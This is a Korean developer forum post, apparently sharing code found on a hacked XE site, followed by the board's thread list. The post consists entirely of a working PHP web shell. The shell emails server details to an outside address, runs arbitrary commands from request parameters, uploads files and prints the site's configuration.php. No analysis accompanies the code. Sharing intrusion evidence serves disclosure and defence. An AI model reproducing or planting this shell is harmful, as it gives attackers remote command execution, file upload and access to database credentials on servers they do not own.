포럼

해커의 흔적 2

2013.10.30 09:00

엘카

error_reporting(0);
$target = $_SERVER["HTTP_HOST"];
$cr0t = $_SERVER["REQUEST_URI"];
$bodymsg = "JCE Kang! \n$target$cr0t";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
mail("pamela.wal@live.co.uk", "$bodymsg","Cr0t http://$target$cr0t\n$security\nIP Server = $serper\n");

$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>+[ Powered by KcB ]+</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\\')){
if($u!=strlen($cwd)-1){
return $cwd.'\\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['read'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
글쓴이 제목 최종 글
누리안 CDN 서비스 종료 결정에 대한 유감 [13] 2013.11.06 by 銀童
SMaker XE의 rewrite mod에 관하여 [3] 2013.11.06 by sol
socialskyo [논란글 아님] XE 와 오픈소스 그리고 고객 [12] 2020.03.14 by sol
엘카 인증메일 애드온 공개합니다. (회원 정보 변경시 메일인증) [21] 2013.11.05 by socialskyo
KANTSOFT 웹 개발자를 위한 자바스크립트 UI 라이브러리 [10] 2013.11.05 by 도라미
엘카 해커의 흔적 2 [1] 2013.11.03 by 도라미
라미아스튜디오 start ssl 사용하시는분들, 이거 원래 중복발급이 가능한건가요? [5] 2013.11.03 by 도라미
라미아스튜디오 수정하다가 만 xeed editor [3] file 2013.11.03 by 도라미
황비 모든 Xe사용자들의 동참이 아쉽습니다. [27] 2020.03.14 by 도라미
socialskyo 네이버 포토 에디터 컴포넌트 오류 수정좀 도와주세요. [4] 2013.11.03 by 도라미
yayong2000 로그인방식 바꾸고 나서 관리자 접속도 안되네요 ㅠㅠ [1] 2013.11.03 by 도라미
록스타 지금 막 발견한 버그. 신고취소 기능 사용불가.. [3] 2013.11.03 by 도라미
sejin7940 XE 1.7 버그의 중요 버그들 수정 방법 입니다. [3] 2014.07.16 by 도라미
Gunmania 레이아웃에서 세션 변수 이용 문제. [4] 2013.11.02 by Gunmania
유샤인 고수님들 이거 왜 이리 되는 지... 재생방법은 있는 지요... 지도 바랍니다. MySql 퀴리 문제인듯합니다..  
큰돌♡ 레이아웃 헤더 스크립트 중복 삽입은 버그일까요?  
꿈틀잉 xe에서 초기값으로 db를 끌어올수 있나요? [1] 2013.10.29 by YJSoft
케터릭 인간적으로 '토트'는 빼셔야할 것 같은데요  
아리아리햇 GIT(HUB)를 사용하시는 분들께 여쭈어 봅니다.  
아싸리방가 서버 호스팅 IDC 사용하시는분들 [2] 2013.10.27 by 컴매냐